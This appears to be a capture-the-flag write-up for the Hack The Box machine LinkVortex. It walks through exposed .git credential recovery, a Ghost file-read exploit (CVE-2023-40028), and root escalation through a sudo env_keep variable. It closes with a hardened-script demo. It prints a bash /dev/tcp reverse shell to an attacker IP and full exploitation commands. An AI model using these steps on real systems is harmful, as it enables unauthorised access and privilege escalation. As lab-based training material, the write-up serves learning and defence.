> m4rt@CTF_ARCHIVE:~$

Hack The Box / LINUX / 2024-12-14

Hack The Box — LinkVortex (Linux)

Ghost admin credentials leaked through an exposed .git directory, authenticated arbitrary file read in Ghost 5.58.0 (CVE-2023-40028) that yields SSH credentials for bob, and root via a sudo env_keep variable that /opt/ghost/clean_symlink.sh executes as a command.

Target

  • IP: 10.129.231.194

Port Scan

sudo nmap -sC -sV 10.129.231.194 -p- -T5 -v
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 3e:f8:b9:68:c8:eb:57:0f:cb:0b:47:b9:86:50:83:eb (ECDSA)
|_  256 a2:ea:6e:e1:b6:d7:e7:c5:86:69:ce:ba:05:9e:38:13 (ED25519)
80/tcp open  http    Apache httpd
|_http-title: Did not follow redirect to http://linkvortex.htb/
|_http-server-header: Apache
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Add linkvortex.htb to /etc/hosts.

Go to:

http://linkvortex.htb/

The page shows "Powered by Ghost", so the site runs the Ghost CMS.

VHost and Directory Enumeration

gobuster vhost -u 'http://linkvortex.htb/' -w /home/kali/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 50 --append-domain
Found: dev.linkvortex.htb Status: 200 [Size: 2538]

Add dev.linkvortex.htb to /etc/hosts.

Go to:

http://dev.linkvortex.htb/

The page says:

Launching soon
Our website is under construction. We'll be here soon with our new and exciting site.

Directory enumeration on the dev vhost:

gobuster dir -u 'http://dev.linkvortex.htb/' -w /home/kali/SecLists/Discovery/Web-Content/raft-small-words.txt -t 50
/.git                 (Status: 301) [Size: 239] [--> http://dev.linkvortex.htb/.git/]

Source Code Retrieval from Exposed Git

Download git-dumper:

  • https://github.com/arthaud/git-dumper
mkdir www
python3 git-dumper/git_dumper.py http://dev.linkvortex.htb/ www

cd www
git status
        new file:   Dockerfile.ghost
        modified:   ghost/core/test/regression/api/admin/authentication.test.js

Two files stand out in the recovered repository: a Dockerfile and a single regression test, so those are the ones to read first.

In ghost/core/test/regression/api/admin/authentication.test.js the test fixture has been edited to use a non-default password:

            const email = 'test@example.com';
            const password = 'OctopiFociPilfer45';

Go to:

http://linkvortex.htb/ghost/

Login with the password from the edited test; admin@linkvortex.htb is the obvious admin address for the domain:

  • email: admin@linkvortex.htb
  • password: OctopiFociPilfer45

Ghost Arbitrary File Read (CVE-2023-40028)

From Dockerfile.ghost, we notice Ghost version 5.58.0.

This version is affected by CVE-2023-40028 (fixed in Ghost 5.59.1): Ghost extracted uploaded theme archives without rejecting symbolic links, so an authenticated user with theme-upload rights can ship a symlink to any file on the host inside the zip and then read it back as a theme asset. The admin credentials recovered above satisfy that precondition, which is why the PoC below asks for a login.

PoC:

  • https://github.com/0xyassine/CVE-2023-40028

Download:

  • https://github.com/0xyassine/CVE-2023-40028/raw/refs/heads/master/CVE-2023-40028.sh

Edit the script so the target URL is:

GHOST_URL='http://linkvortex.htb'

Then run it with the admin credentials:

chmod +x CVE-2023-40028.sh
./CVE-2023-40028.sh -u admin@linkvortex.htb -p OctopiFociPilfer45
WELCOME TO THE CVE-2023-40028 SHELL

Read passwd:

file> /etc/passwd

The entry for user node (the default unprivileged user of the official Node.js Docker image) indicates the read happens inside the Ghost container rather than on the host, which matches the Dockerfile.ghost found in the repository.

Read the Ghost configuration; Dockerfile.ghost gives its path as /var/lib/ghost/config.production.json:

file> /var/lib/ghost/config.production.json

We notice a set of credentials for bob:

      "auth": {
        "user": "bob@linkvortex.htb",
        "pass": "fibber-talented-worth"
      }

SSH Access as bob

ssh bob@linkvortex.htb

The password from config.production.json is reused for bob's SSH account on the host.

sudo -l
Matching Defaults entries for bob on linkvortex:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty,
    env_keep+=CHECK_CONTENT

User bob may run the following commands on linkvortex:
    (ALL) NOPASSWD: /usr/bin/bash /opt/ghost/clean_symlink.sh *.png

Read the script (the sudo rule allows any argument ending in .png, and env_keep+=CHECK_CONTENT means that variable survives sudo's env_reset):

cat /opt/ghost/clean_symlink.sh
#!/bin/bash

QUAR_DIR="/var/quarantined"

if [ -z $CHECK_CONTENT ];then
  CHECK_CONTENT=false
fi

LINK=$1

if ! [[ "$LINK" =~ \.png$ ]]; then
  /usr/bin/echo "! First argument must be a png file !"
  exit 2
fi

if /usr/bin/sudo /usr/bin/test -L $LINK;then
  LINK_NAME=$(/usr/bin/basename $LINK)
  LINK_TARGET=$(/usr/bin/readlink $LINK)
  if /usr/bin/echo "$LINK_TARGET" | /usr/bin/grep -Eq '(etc|root)';then
    /usr/bin/echo "! Trying to read critical files, removing link [ $LINK ] !"
    /usr/bin/unlink $LINK
  else
    /usr/bin/echo "Link found [ $LINK ] , moving it to quarantine"
    /usr/bin/mv $LINK $QUAR_DIR/
    if $CHECK_CONTENT;then
      /usr/bin/echo "Content:"
      /usr/bin/cat $QUAR_DIR/$LINK_NAME 2>/dev/null
    fi
  fi
fi

Privilege Escalation to Root

Three things combine here. The script runs as root without a password, and sudo's env_keep+=CHECK_CONTENT lets the caller pass in an environment variable that survives env_reset. The script never validates that variable: `if $CHECK_CONTENT;then` expands it and executes the result as a command, so any value that is a path to a program runs as root. The only constraints on the argument are that its name ends in .png (the sudoers glob and the regex) and that, if it is a symlink, its target does not match (etc|root); in that case the link is moved to quarantine and the `if $CHECK_CONTENT` line is reached. A symlink to a harmless path satisfies all of that.

cd /dev/shm

Create a file rev in /dev/shm containing a bash reverse shell back to the attacking machine (10.10.16.12:4444):

#!/bin/bash
bash -i >& /dev/tcp/10.10.16.12/4444 0>&1

Make it executable:

chmod +x rev

Start a listener on the attacking machine:

nc -vlnp 4444

On the target, still in /dev/shm, create a symlink whose name ends in .png and whose target avoids the etc/root filter:

ln -s /hello hello.png

Run the script through sudo with CHECK_CONTENT set to the payload path; sudo keeps the variable because of env_keep:

CHECK_CONTENT='/dev/shm/rev' sudo /usr/bin/bash /opt/ghost/clean_symlink.sh hello.png

The script moves hello.png to /var/quarantined, then `if $CHECK_CONTENT` executes /dev/shm/rev as root and the listener receives a root shell.
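The root cause of the privilege escalation, reproduced as an added example in an unprivileged sandbox (this is not code from the box or from the writeup): a vulnerable `if $CHECK_CONTENT` check modelled on clean_symlink.sh next to a hardened version that treats the variable as data, plus a small triage helper that lists env_keep variables from `sudo -l` output. The sudoers side is not reproduced; everything runs as the invoking user, `touch <marker>` stands in for the writeup's /dev/shm/rev payload, and the sample `sudo -l` text is constructed from the listing above.

```shell
#!/usr/bin/env bash
# Added example for this page; not code from the box or the writeup.
# Shows why `if $CHECK_CONTENT; then` is command execution and what the
# script should have done instead. Runs unprivileged; the marker file and
# the `touch` payload are stand-ins chosen for the demo.

# Vulnerable pattern, modelled on the original clean_symlink.sh.
vuln_check_content() {
  CHECK_CONTENT="$1"
  if [ -z "$CHECK_CONTENT" ]; then
    CHECK_CONTENT=false
  fi
  # The bug: $CHECK_CONTENT is word-split and run as a command, and its exit
  # status picks the branch. "true" and "false" happen to be real commands,
  # which is why the script appears to work for the intended values.
  if $CHECK_CONTENT; then
    echo "Content:"
  fi
}

# Hardened pattern: the variable is compared as a string and never executed.
safe_check_content() {
  case "${1:-false}" in
    true)  echo "Content:" ;;
    false) ;;
    *)     echo "! CHECK_CONTENT must be true or false !" >&2; return 2 ;;
  esac
}

# Feed an attacker-controlled value through one variant and report whether
# the embedded command actually ran. Prints "executed" or "not-executed".
run_demo() {
  variant="$1"
  d=$(mktemp -d)
  marker="$d/pwned"
  "$variant" "touch $marker" >/dev/null 2>&1 || true
  if [ -e "$marker" ]; then
    result=executed
  else
    result=not-executed
  fi
  rm -rf "$d"
  echo "$result"
}

# Triage helper for `sudo -l` output on stdin: list every variable sudo will
# keep across env_reset. Any of these read by a NOPASSWD script is a lead.
# Handles both env_keep+=VAR and env_keep+="VAR1 VAR2".
kept_env_vars() {
  grep -o 'env_keep+="*[A-Za-z_][A-Za-z0-9_ ]*' \
    | sed 's/^env_keep+=//; s/"//g' \
    | tr ' ' '\n' \
    | grep -v '^$' \
    | sort -u
}

# Constructed sample in the shape of the writeup's `sudo -l` output.
SAMPLE_SUDO_L='Matching Defaults entries for bob on linkvortex:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty,
    env_keep+=CHECK_CONTENT'

echo "vulnerable variant: $(run_demo vuln_check_content)"   # executed
echo "hardened variant:   $(run_demo safe_check_content)"   # not-executed
echo "kept env vars:      $(printf '%s\n' "$SAMPLE_SUDO_L" | kept_env_vars)"   # CHECK_CONTENT
```

The fix is the same one that applies to any shell script run under sudo: never expand a variable into command position, and drop `env_keep` entries that a privileged script consumes as input.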